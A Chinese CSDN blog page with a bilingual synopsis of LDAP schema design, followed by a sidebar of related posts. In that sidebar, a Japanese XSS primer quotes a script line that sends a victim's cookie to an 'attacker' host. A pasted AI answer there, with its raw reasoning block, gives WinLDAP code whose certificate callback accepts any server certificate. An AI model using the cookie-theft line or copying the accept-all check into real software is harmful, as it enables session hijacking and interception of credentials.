LDAP SCHEMA DESIGN_Synopsis (大纲)

最新推荐文章于 2022-11-21 18:26:59 发布
原创 最新推荐文章于 2022-11-21 18:26:59 发布 · 133 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#设计模式 #数据结构 #咨询 #Access #performance

本文探讨了如何在一个组织内利用单一的LDAP目录为多种应用程序提供服务。重点在于目录的设计及其实现过程中的注意事项,包括避免后期重组、区分不同类型的数据、以及提高查询性能的设计技巧。

 

Synopsis (大纲)

It is possible to make one LDAP directory serve many applications in an organisation. This has the advantage of reducing the effort required to maintain the data, but it does mean that the design must be thought out very carefully before implementation starts.

LDAP directories are structured as a tree of entries, where each entry consists of a set of attribute-value pairs describing one object. The objects are often people, organisations, and departments, but can be anything at all. Schema is the term used to describe the shape of the directory and the rules that govern its content.

在一个特定的组织中,经常会出现一个 LDAP 目录为多个应用程序提供服务的情况。这种做法有利于减少数据维护的工作量,但如果采取这种设计,就必须在实施之前进行认真的思考,规划。在结构上, LDAP 目录是一棵由实体( entity )组成的树( tree )。一个实体则是一个包含多个属性值对的对象。对应通常是人、组织,或者部门,或者其他任何事物。模式这个概念用来描述目录的的结构以及内容应该遵循的规范。

A hypothetical organisation is described, with requirements for “white pages” directory service as well as a wide range of authentication, authorisation, and application-specific directory needs.The issues arising from the LDAP standards are discussed, along with the problems of maintaining compatibility with a range of existing LDAP clients.

本文档描述了一个“假象的”组织,对该组织的描述满足以下需求:采用平面的描述方式;授权,认证,程序规范目录需求。讨论的主题包括 LDAP 标准,以及由兼容已经存在的 LDAP 客户端带来的兼容性问题。

A plan is proposed for the layout of the directory tree, with particular emphasis on avoiding the need to re-organise it later. This involves careful separation of the data describing people,departments, groups, and application-specific objects. A simple approach to entry design is shown, based on the use of locally-defined auxiliary object classes. The effects of schema design on lookup performance are discussed. Some design tricks and pitfalls are presented, based on recent consulting experience.

本文档还提出了一个目录树的推荐布局,该布局强调“避免今后可能出现的重新组织”。为了满足这一要求,在设计时需要注意区分人,部门,组织以及程序细节的对象。为此本文档展示了一个简单的基于使用本地定义的 object classentry 设计策略。与此同时,与 schema 设计相关的查询性能问题在本文档中也有所涉及;并基于近期的咨询经验,给出了一些设计手段和缺陷预防措施。

1 LDAP

LDAP can be used to access information describing people, organisations, roles, services, and many other sorts of entity. It is a standard and widely-implemented protocol, which makes it extremely valuable for integrating multiple applications that need to share common data.

人们已经习惯于用 LDAP 来访问描述人,组织,角色,服务以及其他种类实体的信息。 LDAP 已经成为一个标准的,被广泛应用的协议,这一协议对在多个应用程序中共享数据有着重要价值。

It is important to understand the LDAP data model when considering schema. It is different from the relational model used by most well-known database systems, and this affects the way LDAP systems are designed and used.

要讨论 schema 设计,首先要理解 LDAP 数据模型。 LDAP 中使用到的数据模型与在其他数据库系统中大行其道的关系型模型不同,这一差异导致了 LDAP 系统的不同设计方式和应用方式。

Strictly speaking, LDAP is a protocol - the Lightweight Directory Access Protocol. It is not a database or even a directory although the term LDAP directory is often used to describe a directory service that is accessed using the LDAP protocol. LDAP derives from the X.500/ISO-9594 standards, and was originally intended as a simplified protocol for small computers to use when accessing X.500 systems. In recent years, LDAP has expanded and is now just as complex as X.500 but it still shares the same data model and part of the same distributed-service model.

严格来讲, LDAP 是一个协议( Lightweight Directory Access Protocol 轻型目录访问协议)尽管 LDAP 目录通常用来描述使用 LDAP 进行访问的目录服务,但 LDAP 本身不是一个数据库也不是一个目录。 LDAP 这个概念来源于 X.500/ISO-9594 标准。这个概念本来用于表示小型机使用的,访问 X.500 系统的简单协议。但最近这些年, LDAP 已经被扩展到与 X.500 本身几乎同样复杂。但无论如何, LDAP 还是来用共享相同的数据模型和一部分相同的分布式服务模型。

[RFC3377]

1.1 The LDAP data structure

An LDAP Directory stores information in a tree structure known as the Directory Information Tree (DIT). The nodes in the tree are directory entries, and each entry contains information in attribute-value form. Some attributes may have multiple values; others are restricted to a single value. The set of attributes that may be present in an entry is determined by the objectClass attribute, which is always present. objectClass is a multi-valued attribute and each value defines a set of mandatory and/or optional attributes.

LDAP 目录将信息保存在树形结构中,这种结构被称为 DIT 。树中的节点称为实体,每个实体中保持的信息以属性值的方式存在。某些属性可能是多值的也可能是单值的。某个实体中可能出现的属性在该实体的 objectClassobjectClass 是必然出现的)中描述。 objectClass 是一个多值属性,它的每一个值都会定义必须出现 / 可选的属性值。

Each node in the DIT has a name called the Relative Distinguished Name (RDN) which is unique among the peer nodes under its parent. It also has a globally-unique name called the Distinguished Name (DN) made up from the name of the node itself plus the names of all its superior nodes up to the root of the DIT.

每个 DIT 中的节点都拥有一个叫做 RDN 的名字。同一节点的所有子节点中,该名字是唯一的。除此之外,每个节点还会有一个全局唯一的名字叫做 DNDN 由节点自己的名字加上其高级节点的所有名字序列组成。

1.2 The LDAP Distributed Service model

X.500 was conceived as a global directory service. As such, it was expected to hold hundreds of millions of entries and be managed by thousands of different organisations. This led to a service model based on many co-operating servers known as DSAs (Directory System Agents). Each DSA can hold data from one or more arcs of the DIT, and is provided with “knowledge” so that it can direct queries for on-local data to the appropriate place. Queries are expected to outnumber updates by a very large factor, and absolute data consistency across the DIT is not supported, so data can be replicated easily for performance and resilience.

X.500 本认为是一个全局的目录服务。因此,它应该能够保存成千上万的实体,这些实体由上千个不同的组织进行管理。这就引出了一个基于多个合作 serverDSA )的服务模式。每个 DSA 可以保持一个或多个 DIT 结构,与此同时, DSA 应该能够提供能够将对本地数据的查询路由到恰当之处的知识。由于一个重要因素,查询次数应该远远大于修改次数。 LDAP 并不支持跨越 DIT 的,绝对的数据一致性。因此数据可能因为性能和弹性因素被轻松的复制。

An LDAP server is effectively a DSA and it follows the same rules, though LDAP does not have such a good distributed-service model for very large networks. Most current LDAP deployments are limited to operation within a single organisation, so although data replication is commonly used, the other features of the distributed service model do not get so much exercise. X.500 and LDAP have many similarities with DNS in terms of data model and service model, but the directory systems are capable of more complex operations.

尽管 LDAP 并不能实现全网络的的分布式服务模型,一个 LDAP Server 实际上就是一个遵循同一规则的 DSA 。大多数并行的 LDAP 部署都仅仅局限于在同一个组织内部,所以尽管数据复制随处可见,其他分布式服务的特征却并不是很常见。 X.500LDAP 在数据模型和服务模型上与 DNS 在概念上有很多相同之处,只不过目录系统包含更多复杂的操作。

 

LDAP报错:ldap_sasl_interactive_bind_s
周源的专栏
10-20 5264
如果报ldap_sasl_interactive_bind_s错误,且发现/etc/krb5.keytab不存在, 执行如下操作: cp /etc/openldap/ldap.keytab /etc/krb5.keytab chgrp ldap /etc/krb5.keytab && chmod 640 /etc/krb5.keytab 要以 root 用户身份运行 slapd 注
Impala - 登录用户身份认证-ldap_password_cmd使用详解
摸鱼同学的博客
09-09 6216
实践是检验真理的唯一标准! -ldap_password_cmd:运行以检索LDAP密码的Shell命令 准备工作: [root@localhost impala]$ vi /home/test/impala/pwd-impala 123456 [root@localhost impala]$ cat /home/test/impala/pwd-impala 123456 先切换我当前的用户,以免混淆 [root@localhost impala]$ kinit hbase Passwor
java连接ldap服务器_客户端无法连接到ldap服务器
weixin_42144201的博客
02-26 1516
我是使用ldap和slapd的新手,我在使用我的客户端机器连接到托管slapd的服务器时遇到了一些麻烦 . 这是向下运行:在ubuntu盒子上我有一个运行带有CentOS的虚拟机的虚拟机实例 . 我已经在CentOS vm上安装并配置了slapd,只要我在vm上,我就可以使用ldapsearch,ldapadd等,一旦我移动到客户端机器(包含vm的ubuntu发行版),我运行以下命令:ldapse...
ldap端口超时设置_ldap_modify:更改密码时访问不足(50)
weixin_32843345的博客
02-01 2248
我正在尝试在CentOS 6.7上的新OpenLDAP安装上修改LDAP管理员密码(类似于RHEL 6.7).我创建了一个名为change_ldap_password.ldif的文件:# Hash your password:# slappasswd -h {SSHA} -s "my_password"# I also tried {1}hdb instead of {0}configdn: ol...
ldap基本dn_LDAP基本概念
weixin_34024811的博客
01-14 4442
1、LDAP的存储规则区分名(DN,Distinguished Name)和自然界中的树不同,文件系统/LDAP/电话号码簿目录的每一片枝叶都至少有一个独一无二的属性,这一属性可以帮助我们来区别这些枝叶。在文件系统中, 这些独一无二的属性就是带有完整路径的文件名。比如/etc/passwd,该文件名在该路径下是独一无二的。当然我们可以有/usr/passwd, /opt/passwd,但是根据它们...
通信协议_LDAP_数据操作
前行
09-21 2907
基于Linux命令行,软件为OpenLDAP; 插入语句:ldapadd -x -h localhost -p 6005 -w password -D cn=linuxUserName -v -f fileName.ldif 查询语句:ldapsearch -x -LLL -h localhost -p 6005 -w password -D cn=linuxUserName -b dc=dc...
ldap_sasl_bind(SIMPLE): Can't contact LDAP server (-1)
weixin_34278190的博客
12-13 3952
[root@ldaptest openldap]# ldapadd -x -D "cn=admin,dc=ultrapower,dc=com" -W -f /tmp/base.ldifEnter LDAP Password: ldap_sasl_bind(SIMPLE): Can't contact LDAP server (-1)[root@ldaptest openldap]# ldapad...
Ldap自定义Schema
Rebel_z的博客
11-21 1579
Ldap自定义Schema,attributetype: Inconsistent duplicate attributeType: "xx",value #0 olcAttributeTypes: Inconsistent duplicate attributeType: "xx"
LDAP_ACCOUNT_MANAGER安装
老实人的博客
01-09 5822
web 配置 准备 安装 php5.6 # 配置 php5.6 yum 源 # yum -y install http://rpms.remirepo.net/enterprise/remi-release-7.rpm # 安装yum 管理工具 # yum -y install yum-utils # 开启 php5.6 安装源 # yum-config-manager --enable re...
LDAP常用函数和命令
一路奔跑94的博客
09-03 2242
  说明:鉴于LDAP资料的匮乏,为了避免大家在开发中花费大量的时间去了解LDAP,特撰写本文档,供大家开发时候参考使用,也可供将来邮件系统管理人员配置LDAP时候参考使用。本文件是在查阅RFC1823,2251 2252 2253,2254和2255,以及结合本人在实际项目开发中的经验的基础上整理而成,重点描述了在项目中所需的LDAP的相关知识。   几个常见缩写   Distin...
jndi.zip_java ldap_jndi_jndi ldap_ldap_ldap java
09-24
在本案例中,我们关注的是JNDI与Lightweight Directory Access Protocol (LDAP) 的结合使用,这是一个广泛应用于分布式环境中的目录服务协议。通过JNDI,Java开发者可以方便地与LDAP服务器进行交互,实现诸如连接、...
ldap_delete.rar_c++ ldap_ldap_ldap删除条目
09-21
本篇文章将深入探讨如何使用C++进行LDAP条目的删除操作,基于"ldap_delete.rar_c++ ldap_ldap_ldap删除条目"的标题和描述,我们将重点关注C++编程中的LDAP操作,特别是删除条目这一环节。 首先,要实现C++中对LDAP...
Sync_Data.rar_C LDAP AD_c++ ldap_ldap_数据同步
09-21
例如,使用`ldap_search_s()`函数进行搜索操作,`ldap_add_s()`用于添加新记录,`ldap_modify_s()`修改现有条目,以及`ldap_delete_s()`删除条目。 2. **Microsoft Active Directory (AD) 集成**: AD是微软提供的...
LDAP.rar_java ldap_ldap_ldap java
09-19
**LDAP简介** Lightweight Directory Access Protocol(轻量级目录访问协议)是互联网上广泛使用的协议,用于访问和管理分布式目录服务。它提供了一种标准的方法来存储、查询和更新各种网络资源的信息,如用户账户...
精选资源
ldap_demon_test:ldap_demon_nginx
03-30
标题“ldap_demon_test:ldap_demon_nginx”暗示了我们正在处理一个关于LDAP(轻量级目录访问协议)和Nginx服务器的测试场景。在这个场景中,“ldap_demon”可能是一个服务或者工具,用于模拟或管理LDAP目录,而...
一个纯java的验证码识别算法
我的读书笔记
04-05 994
在进行性能测试时,某些时候需要输入验证码。手工输入是不可能的,这就需要验证码的自动识别。 附件中的验证码识别算法对纯数字的验证码,可以达到百分之四十的正确率,基本够用了。 main方法入口: GUIController 样本图片:trainningpic.zip (使用方法:图片命名的最后一位是图片的数字值) ...
2.3. Locking(锁机制)
我的读书笔记
12-28 539
2.3. Locking(锁机制) We were able to add one state variable to our servlet while maintaining thread safety by using a thread-safe object to manage the entire state of the servlet. But if we want to add ...
連載二、クロスサイトスクリプティング基本
我的读书笔记
07-13 492
XSSセキュリティホールによる起こり得る被害 ●cookieの盗難  これがXSSの被害としては一般に広く知られている。「document.location="http://attacker/cookie.cgi? cookie="+document.cookie;」というスクリプトを実行されると、攻撃者サイトのcookie.cgiにユーザーのcookieを 含んだ形でアク...
3.1. Visibility(可见性)
我的读书笔记
12-30 385
3.1. Visibility(可见性) Visibility is subtle because the things that can go wrong are so counterintuitive. In a single-threaded environment, if you write a value to a variable and later read that variab...
ldap_set_option(ld, LDAP_OPT_SERVER_CERTIFICATE, LDAP_OPT_ON)后ldap_bind_s奔溃
最新发布
09-03
<think> 我们正在解决使用WinLDAP时,在设置LDAP_OPT_SERVER_CERTIFICATE选项为LDAP_OPT_ON后,ldap_bind_s崩溃的问题。 根据用户描述,他们在执行ldap_set_option(ld, LDAP_OPT_SERVER_CERTIFICATE, LDAP_OPT_ON)后,调用ldap_bind_s时崩溃。 可能的原因及解决方案: 1. **内存或句柄问题**:在调用ldap_set_option之前,LDAP会话句柄(ld)可能未正确初始化,或者已经被释放。 解决方案:确保正确初始化LDAP会话句柄,并确保在设置选项和绑定期间该句柄有效。 2. **选项设置时机**:设置证书验证选项的时机不正确。应该在初始化LDAP会话之后,但在执行任何操作(如绑定)之前设置。 解决方案:确保调用顺序为:ldap_init -> ldap_set_option -> ... (其他设置) -> ldap_bind_s。 3. **选项值LDAP_OPT_ON的含义**:在WinLDAP中,LDAP_OPT_SERVER_CERTIFICATE选项用于设置服务器证书验证的回调函数。直接设置为LDAP_OPT_ON可能不正确,因为该选项期望的是一个回调函数,而不是一个开关值。 实际上,根据微软文档,LDAP_OPT_SERVER_CERTIFICATE选项对应的值应该是一个指向回调函数的指针,该函数用于验证服务器证书。如果我们不想验证,应该使用LDAP_OPT_SSL选项并设置为LDAP_OPT_OFF,或者使用LDAP_OPT_SERVER_CERTIFICATE并提供一个始终返回成功的回调函数。 4. **正确的禁用证书验证方法**:在测试环境中,我们通常希望禁用证书验证。在WinLDAP中,正确的方法有两种: a) 设置LDAP_OPT_SSL为LDAP_OPT_OFF(但这样会完全禁用SSL,不推荐)。 b) 设置LDAP_OPT_SERVER_CERTIFICATE选项为一个回调函数,该函数总是返回TRUE(表示接受任何证书)。 5. **回调函数示例**:提供一个简单的回调函数,总是返回TRUE(即接受服务器证书)。 因此,崩溃的原因很可能是我们将一个整数值(LDAP_OPT_ON)作为函数指针传递给了系统,当系统试图调用这个“函数”时,导致非法访问。 解决方案:改为设置一个回调函数。 步骤: 1. 定义一个回调函数,用于验证证书。如果我们要忽略验证,则始终返回TRUE。 2. 将该回调函数通过ldap_set_option设置给LDAP_OPT_SERVER_CERTIFICATE选项。 示例代码: ```c #include <winldap.h> #include <winber.h> // 定义证书验证回调函数,总是返回TRUE表示接受任何证书 BOOL CALLBACK IgnoreCertVerify( __in PLDAP Connection, __in PCCERT_CONTEXT* ppServerCert, __in void* pvArg ) { return TRUE; } int main() { LDAP* ld = NULL; // 初始化LDAP会话,使用SSL端口636 ld = ldap_sslinit("ldap.example.com", 636, 1); if (ld == NULL) { // 处理错误 } // 设置选项:使用回调函数忽略证书验证 ldap_set_option(ld, LDAP_OPT_SERVER_CERTIFICATE, (void*)IgnoreCertVerify); // 设置版本(可选,但推荐) ULONG version = LDAP_VERSION3; ldap_set_option(ld, LDAP_OPT_VERSION, &version); // 执行绑定 ULONG rc = ldap_bind_s(ld, "cn=admin,dc=example,dc=com", "password", LDAP_AUTH_SIMPLE); if (rc != LDAP_SUCCESS) { // 处理错误 } // ... 其他操作 ldap_unbind(ld); return 0; } ``` 注意:在生产环境中,应该实现一个真正的证书验证回调函数,检查证书的有效性。 6. **其他注意事项**: - 确保在设置选项时使用正确的选项值类型。LDAP_OPT_SERVER_CERTIFICATE需要一个函数指针,而LDAP_OPT_ON是一个整数值(1),不能用作函数指针。 - 检查LDAP句柄初始化是否成功(非NULL)。 - 如果仍然崩溃,检查是否有多线程问题?确保LDAP句柄不被多个线程同时使用。 引用说明: 根据WinLDAP文档,LDAP_OPT_SERVER_CERTIFICATE选项用于设置一个回调函数,当需要验证服务器证书时调用。这个回调函数的签名必须是:`int (*)(LDAP*, PCCERT_CONTEXT*, void*)`,但实际在wincrypt.h中,PCCERT_CONTEXT是指向CERT_CONTEXT的指针,因此回调函数应返回BOOL(TRUE表示接受,FALSE表示拒绝)[^1]。 因此,之前错误地将LDAP_OPT_ON(一个整数值)作为函数指针传递,导致崩溃。 相关问题: 1. 如何在WinLDAP中正确实现服务器证书验证? 2. 除了忽略证书验证,还有其他方法解决自签名证书的问题吗? 3. WinLDAP中如何处理证书吊销检查? 4. 在多线程环境中如何使用WinLDAP的证书回调函数? 注意:上述代码示例适用于测试环境。在生产环境中忽略证书验证会带来安全风险,应使用受信任的证书或正确验证证书链。 </think> ### WinLDAP 中 `ldap_set_option(ld, LDAP_OPT_SERVER_CERTIFICATE, LDAP_OPT_ON)` 导致 `ldap_bind_s` 崩溃的解决方案 #### 崩溃根本原因分析 1. **选项值类型不匹配** `LDAP_OPT_SERVER_CERTIFICATE` 要求传入 **回调函数指针**,而不是整型常量 `LDAP_OPT_ON`。 错误代码会被解释为无效内存地址,导致访问冲突崩溃。[^1][^2] $$\text{错误类型} = \begin{cases} \text{预期} & \text{函数指针} \\ \text{实际} & \text{整数 } (1) \end{cases}$$ 2. **线程安全问题** WinLDAP 的证书回调在多线程环境下需全局同步,未同步时可能触发竞争条件[^4]。 3. **内存管理缺陷** 未初始化的 LDAP 句柄或无效上下文指针引发空指针异常。 --- ### 分步解决方案 #### 步骤1:定义证书验证回调函数 ```c #include <winldap.h> #include <wincrypt.h> // 始终返回 TRUE 的简单回调(跳过验证) BOOL CALLBACK IgnoreCertVerify( __in PLDAP Connection, __in PCCERT_CONTEXT* ppServerCert, __in void* pvArg ) { return TRUE; // 接受所有证书 } ``` #### 步骤2:正确设置回调函数 ```c LDAP* ld = ldap_sslinit("ldap.example.com", 636, 1); // 1=启用SSL // 正确设置回调函数(非LDAP_OPT_ON!) ldap_set_option( ld, LDAP_OPT_SERVER_CERTIFICATE, (void*)IgnoreCertVerify // 传入函数指针 ); // 验证选项设置结果 void* funcPtr = NULL; ldap_get_option( ld, LDAP_OPT_SERVER_CERTIFICATE, &funcPtr ); assert(funcPtr == IgnoreCertVerify); // 确保设置成功 ``` #### 步骤3:安全的绑定调用 ```c // 绑定前验证句柄有效性 if (ld == NULL || (ULONG_PTR)ld <= 0x10000) { fprintf(stderr, "无效LDAP句柄: 0x%p\n", ld); abort(); } // 同步调用(避免多线程竞争) ULONG rc = ldap_bind_s( ld, "cn=admin,dc=example,dc=com", L"password", // UNICODE字符串 LDAP_AUTH_SIMPLE ); if (rc != LDAP_SUCCESS) { fprintf(stderr, "绑定失败: 0x%X\n", rc); } ``` --- ### 崩溃预防最佳实践 1. **回调函数必备** 永远不要将 `LDAP_OPT_ON` 用于证书选项,必须实现回调函数[^2]。 2. **内存安全初始化** ```c // 安全初始化模式 LDAP* ld = ldap_init("ldap.example.com", 389); ldap_set_option(ld, LDAP_OPT_SSL, LDAP_OPT_ON); // 显式启用SSL ``` 3. **多线程防护** ```c // 全局初始化(仅一次) static CRITICAL_SECTION ldapCs; InitializeCriticalSection(&ldapCs); // 线程安全调用 EnterCriticalSection(&ldapCs); ldap_set_option(ld, ...); LeaveCriticalSection(&ldapCs); ``` --- ### 替代解决方案(无回调) ```c // 方法1:完全禁用SSL验证(不推荐) ldap_set_option(ld, LDAP_OPT_SSL, LDAP_OPT_OFF); // 方法2:注册系统信任的证书 certutil -addstore "Root" ldap_server.cer // 需先导入证书 ``` --- ### 根本原因验证流程 ```mermaid graph TD A[崩溃] --> B{检查参数类型} B -->|LDAP_OPT_ON| C[类型错误] B -->|回调函数| D[类型正确] C --> E[访问冲突] D --> F[执行回调] F -->|返回TRUE| G[绑定成功] F -->|返回FALSE| H[绑定失败] ``` > **警告**:生产环境必须实现真正的证书验证逻辑,示例中的 `IgnoreCertVerify` 仅用于测试[^1]。 --- ### 相关问题 1. 如何实现完整的 LDAPS 证书链验证回调? 2. WinLDAP 中如何处理证书吊销列表 (CRL) 检查? 3. 在多线程服务中如何安全共享 LDAP 连接? 4. 使用自签名证书时如何避免 `CERT_E_UNTRUSTEDROOT` 错误? [^1]: 原始讨论表明选项设置错误会导致意外行为 [^2]: PHP 示例展示正确选项设置需结构体而非简单值 [^3]: 基础 LDAP 操作需确保参数有效性 [^4]: 选项处理涉及复杂内存管理
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值